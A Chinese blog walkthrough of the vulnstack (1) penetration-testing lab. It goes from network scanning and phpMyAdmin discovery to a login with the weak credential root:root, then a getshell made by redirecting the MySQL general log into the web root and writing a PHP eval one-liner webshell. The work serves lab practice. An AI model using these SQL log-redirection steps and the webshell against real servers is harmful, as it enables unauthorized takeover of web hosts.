当前位置: 首页 > article >正文

【红日安全】vulnstack (一)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦

【红日安全】vulnstack (一)

  • 靶场搭建
  • 靶场渗透
    • 明确目标
    • 信息收集
    • phpadmin后台getshell


靶场搭建

靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
下载解压后在VM中打开

靶场渗透

明确目标

目标跟我们处于同一个网段

信息收集

先查一下我们自己的IP,用 ifconfig 查看攻击机的IP为192.168.64.131在这里插入图片描述

探测一下跟我们同一网段下的主机有哪些,用Kali自带的arp扫描器扫描同一网段下的主机,发现了同一网段下的不同IP192.168.64.134,判断它就是要渗透的主机。

arp-scan -l  扫描网段所有主机
arp-scan -I eth0 -l  扫描指定网段所有IP

在这里插入图片描述

扫到IP之后接下来扫描端口,发现它开启了803306端口

nmap -T4 -p- 192.168.64.134

在这里插入图片描述

访问一下80端口,发现是phpStudy探针界面,在其中发现了它的操作系统是Windows,服务器是Apache
在这里插入图片描述

dirsearch扫一下看看能发现什么,成功扫出来了phpmyadmin界面
在这里插入图片描述

访问一下看看,发现是一个登陆界面
在这里插入图片描述

用弱口令试试,刚开始试了admin:123456提示错误,又用root试了一下成功登录进去

账号:root
密码:root

在这里插入图片描述

phpadmin后台getshell

  1. 开启日志
set global general_log='on';

在这里插入图片描述

  1. 改变日志存储位置
set global general_log_file ="c:/phpStudy/www/she.php";

在这里插入图片描述

  1. 写入一句话木马
select '<?php @eval($_POST[cmd]);?>';

在这里插入图片描述

  1. 用蚁剑连接,成功getshell

在这里插入图片描述


http://www.kler.cn/news/360070.html

相关文章:

  • K8S---02.Kubernetes的pod
  • python支付宝支付和回调
  • 计算机毕业设计Python深度学习房价预测 房源可视化 房源爬虫 二手房可视化 二手房爬虫 递归决策树模型 机器学习 深度学习 大数据毕业设计
  • 【Vue.js设计与实现】第三篇第10章:渲染器-双端 Diff 算法-阅读笔记
  • 如何使用postman进行自动化
  • Milvus 到 TiDB 向量迁移实践
  • 关于游戏行业工作的迷茫
  • Sqlite3 操作笔记
  • Java设计模式:工厂模式详解
  • ERC论文阅读(01)--BiosERC论文阅读笔记
  • 数据结构(8.3_2)——快速排序
  • 校园周边美食探索及分享平台的设计与实现(论文+源码)_kaic
  • 数控机械制造工厂ERP适用范围有哪些
  • STM32-Modbus协议(一文通)
  • ​通过‌组策略编辑器关闭​
  • 计算机毕业设计 基于 Python的考研学习系统的设计与实现 Python毕业设计选题 前后端分离 附源码 讲解 文档
  • Python基础和理论学习
  • IP池与代理池的区别
  • 三品PLM系统解决方案赋能航空制造企业 研发管理升级赢得市场主动
  • 配置nginx服务通过ip访问多网站